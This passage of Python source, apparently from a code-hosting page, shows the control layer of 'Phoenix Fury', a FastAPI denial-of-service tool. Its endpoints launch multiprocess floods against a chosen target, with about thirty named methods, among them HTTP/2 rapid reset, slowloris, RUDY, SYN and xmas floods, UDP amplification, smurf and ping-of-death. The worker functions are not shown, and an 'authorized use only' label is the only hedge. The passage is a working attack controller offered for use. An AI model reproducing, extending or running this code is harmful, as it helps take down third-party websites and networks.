| | worker_target = l7_cache_bypass_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| | |
| | else: |
| | attack_name = f"L7-{config.method.upper()}" |
| | worker_target = l7_standard_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.method, REQUESTS_PER_CONNECTION, config.user_agent) |
| | |
| | |
| | elif family == 'l4-tcp' and isinstance(config, L4TCPConfig): |
| | attack_name = f"L4-TCP-{config.method.upper()}" |
| | worker_target = l4_tcp_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.method) |
| | |
| | |
| | elif family == 'l4-udp' and isinstance(config, L4UDPConfig): |
| | attack_name = f"L4-UDP-{config.method.upper()}" |
| | worker_target = l4_udp_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.method, config.payload_size) |
| | |
| | |
| | elif family == 'l4-icmp' and isinstance(config, L4ICMPConfig): |
| | attack_name = f"L4-ICMP-{config.method.upper()}" |
| | worker_target = l4_icmp_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.method) |
| | |
| | self.attack_type = attack_name |
| | |
| | print("\n" + "=" * 80) |
| | print(f"🔥 PHOENIX FURY v10.0 ULTIMATE - ATTACK INITIATED 🔥") |
| | print(f" Type: {self.attack_type}") |
| | print(f" Target: {self.target_host}:{self.port} ({self.target_ip})") |
| | print(f" Duration: {self.duration}s") |
| | print(f" Processes: {self.process_count}") |
| | print(f" Raw Sockets: {'✅ YES' if check_root() else '⚠️ NO (using standard sockets)'}") |
| | print("=" * 80 + "\n") |
| | |
| | for _ in range(self.process_count): |
| | p = multiprocessing.Process(target=worker_target, args=worker_args, daemon=True) |
| | self.processes.append(p) |
| | p.start() |
| | |
| | self.stats_thread = threading.Thread(target=self._stats_calculator, daemon=True) |
| | self.stats_thread.start() |
| | |
| | def stop(self): |
| | with self.lock: |
| | if not self.attack_active: |
| | return |
| | |
| | print(f"\n⚠️ Stop signal received. Terminating {len(self.processes)} processes...") |
| | self.stop_event.set() |
| | |
| | for p in self.processes: |
| | p.join(timeout=3) |
| | |
| | for p in self.processes: |
| | if p.is_alive(): |
| | p.terminate() |
| | |
| | if self.stats_thread: |
| | self.stats_thread.join(timeout=2) |
| | |
| | elapsed = time.time() - self.start_time |
| | total_sent = self.counter.value |
| | avg_rate = total_sent / elapsed if elapsed > 0 else 0 |
| | |
| | print("\n" + "=" * 80) |
| | print("✅ ATTACK TERMINATED") |
| | print(f" Total Requests: {total_sent:,}") |
| | print(f" Elapsed Time: {elapsed:.2f}s") |
| | print(f" Average Rate: {avg_rate:,.2f} RPS/PPS") |
| | print("=" * 80 + "\n") |
| | |
| | self._reset_state() |
| | |
| | def get_status(self) -> StatusResponse: |
| | with self.lock: |
| | elapsed = time.time() - self.start_time if self.attack_active else 0 |
| | total = self.counter.value |
| | avg_rate = total / elapsed if elapsed > 0 else 0 |
| | |
| | return StatusResponse( |
| | attack_active=self.attack_active, |
| | attack_type=self.attack_type, |
| | target_host=self.target_host, |
| | target_ip=self.target_ip, |
| | port=self.port, |
| | duration=self.duration, |
| | elapsed_time=round(elapsed, 2), |
| | processes=self.process_count, |
| | total_sent=total, |
| | current_rate_pps_rps=round(self.current_rate, 2), |
| | average_rate=round(avg_rate, 2), |
| | cpu_usage_percent=psutil.cpu_percent(interval=0.1), |
| | memory_usage_percent=psutil.virtual_memory().percent |
| | ) |
| |
|
| | |
| | |
| | |
| |
|
| | app = FastAPI( |
| | title="🔥 Phoenix Fury v10.0 ULTIMATE - Maximum Methods Edition", |
| | description="Advanced stress testing with 25+ attack methods. ⚠️ AUTHORIZED USE ONLY", |
| | version="10.0.0" |
| | ) |
| |
|
| | MANAGER = AttackManager() |
| |
|
| | def run_attack_lifecycle(config, family: str, background_tasks: BackgroundTasks): |
| | """Handle attack lifecycle.""" |
| | MANAGER.start(config, family) |
| | |
| | def delayed_stop(): |
| | time.sleep(config.duration) |
| | MANAGER.stop() |
| | |
| | stop_thread = threading.Thread(target=delayed_stop, daemon=True) |
| | stop_thread.start() |
| |
|
| | @app.on_event("startup") |
| | async def on_startup(): |
| | print("=" * 80) |
| | print(f"🔥 Phoenix Fury v10.0 ULTIMATE API is ONLINE") |
| | print(f" System: {CPU_COUNT} CPU Cores, {TOTAL_RAM_GB:.1f} GB RAM") |
| | print(f" Config: {MAX_PROCESSES} Workers, {REQUESTS_PER_CONNECTION} L7 reqs/conn") |
| | print(f" HTTP/2: {'✅ ENABLED' if H2_AVAILABLE else '❌ DISABLED (pip install h2)'}") |
| | print(f" Raw Sockets: {'✅ YES (L4 Available)' if check_root() else '⚠️ NO (L4 Limited)'}") |
| | print(f" Methods: 25+ Attack Vectors Available") |
| | print("=" * 80) |
| |
|
| | @app.post("/attack/layer7", status_code=202) |
| | def api_start_l7(config: L7Config, background_tasks: BackgroundTasks): |
| | """ |
| | Start Layer 7 HTTP attack. |
| | |
| | Available methods: |
| | - Standard: get, post, head, put, delete, options, patch, trace |
| | - HTTP/2: http2-rapid-reset, http2-flood, http2-slowloris |
| | - Slowloris: slowloris, slow-post, slow-read, rudy |
| | - Advanced: apache-killer, range-header, cache-bypass |
| | """ |
| | run_attack_lifecycle(config, 'l7', background_tasks) |
| | return {"status": "accepted", "message": f"L7 {config.method.upper()} attack initiated on {config.target}:{config.port}"} |
| |
|
| | @app.post("/attack/layer4/tcp", status_code=202) |
| | def api_start_l4_tcp(config: L4TCPConfig, background_tasks: BackgroundTasks): |
| | """ |
| | Start Layer 4 TCP attack. |
| | |
| | Available methods: |
| | - syn, ack, fin, rst, psh, urg |
| | - syn-ack, xmas, null, land, fragmented |
| | """ |
| | run_attack_lifecycle(config, 'l4-tcp', background_tasks) |
| | return {"status": "accepted", "message": f"L4 TCP {config.method.upper()} attack initiated"} |
| |
|
| | @app.post("/attack/layer4/udp", status_code=202) |
| | def api_start_l4_udp(config: L4UDPConfig, background_tasks: BackgroundTasks): |
| | """ |
| | Start Layer 4 UDP attack. |
| | |
| | Available methods: |
| | - flood, fragmented, amplification |
| | """ |
| | run_attack_lifecycle(config, 'l4-udp', background_tasks) |
| | return {"status": "accepted", "message": f"L4 UDP {config.method.upper()} attack initiated"} |
| |
|
| | @app.post("/attack/layer4/icmp", status_code=202) |
| | def api_start_l4_icmp(config: L4ICMPConfig, background_tasks: BackgroundTasks): |
| | """ |
| | Start Layer 4 ICMP attack. |
| | |
| | Available methods: |
| | - ping-flood, smurf, ping-of-death |
| | """ |
| | run_attack_lifecycle(config, 'l4-icmp', background_tasks) |
| | return {"status": "accepted", "message": f"L4 ICMP {config.method.upper()} attack initiated"} |
| |
|
| | @app.post("/attack/stop") |
| | def api_stop_attack(): |
| | """Stop current attack.""" |
| | if not MANAGER.is_active(): |
| | return {"status": "info", "message": "No attack is currently running."} |
| | MANAGER.stop() |
| | return {"status": "success", "message": "Attack stopped successfully."} |
| |
|
| | @app.get("/status", response_model=StatusResponse) |
| | def get_status(): |
| | """Get real-time attack status and system metrics.""" |
| | return MANAGER.get_status() |
| |
|
| | @app.get("/methods") |
| | def list_methods(): |
| | """List all available attack methods.""" |
| | return { |
| | "layer7": { |
| | "standard_http": ["get", "post", "head", "put", "delete", "options", "patch", "trace"], |
| | "http2_attacks": ["http2-rapid-reset", "http2-flood", "http2-slowloris"], |
| | "slowloris_variants": ["slowloris", "slow-post", "slow-read", "rudy"], |
| | "advanced": ["apache-killer", "range-header", "cache-bypass", "xmlrpc", "wordpress-xmlrpc", "hash-collision"] |
| | }, |
| | "layer4": { |
| | "tcp": ["syn", "ack", "fin", "rst", "psh", "urg", "syn-ack", "xmas", "null", "land", "fragmented"], |
| | "udp": ["flood", "fragmented", "amplification"], |
| | "icmp": ["ping-flood", "smurf", "ping-of-death"] |
| | }, |
| | "total_methods": 30 |
| | } |
| |
|
| | @app.get("/") |
| | def root(): |
| | """Root endpoint with API information.""" |
| | return { |
| | "message": "🔥 Phoenix Fury v10.0 ULTIMATE - Maximum Methods Edition", |
| | "version": "10.0.0", |
| | "docs_url": "/docs", |
| | "status_url": "/status", |
| | "methods_url": "/methods", |
| | "features": { |
| | "http2_rapid_reset": H2_AVAILABLE, |
| | "raw_sockets": check_root(), |
| | "auto_optimized": True, |
| | "total_methods": 30 |
| | }, |
| | "system_info": { |
| | "cpu_cores": CPU_COUNT, |
| | "worker_processes": MAX_PROCESSES, |
| | "ram_gb": round(TOTAL_RAM_GB, 2) |
| | } |
| | } |
| |
|
| | @app.get("/health") |
| | def health_check(): |
| | """Health check endpoint.""" |
| | return { |
| | "status": "healthy", |
| | "attack_active": MANAGER.is_active(), |
| | "timestamp": time.time() |
| | } |
| |
|
| | |
| | |
| | |
| |
|
| | if __name__ == "__main__": |
| | multiprocessing.freeze_support() |
| | |
| | |
| | print("=" * 80) |
| | print("🔥 PHOENIX FURY v10.0 ULTIMATE - MAXIMUM METHODS EDITION") |
| | print("=" * 80) |
| | print(f"System: {CPU_COUNT} cores, {TOTAL_RAM_GB:.1f}GB RAM") |
| | print(f"Workers: {MAX_PROCESSES} processes") |
| | print(f"Methods: 30+ attack vectors") |
| | print(f"Raw Sockets: {'✅ Available' if check_root() else '⚠️ Limited (no root)'}") |
| | print("=" * 80) |
| | |
| | uvicorn.run( |
| | app, |
| | host="0.0.0.0", |
| | port=8000, |
| | workers=1, |
| | log_level="info", |
| | access_log=True |
| | ) |
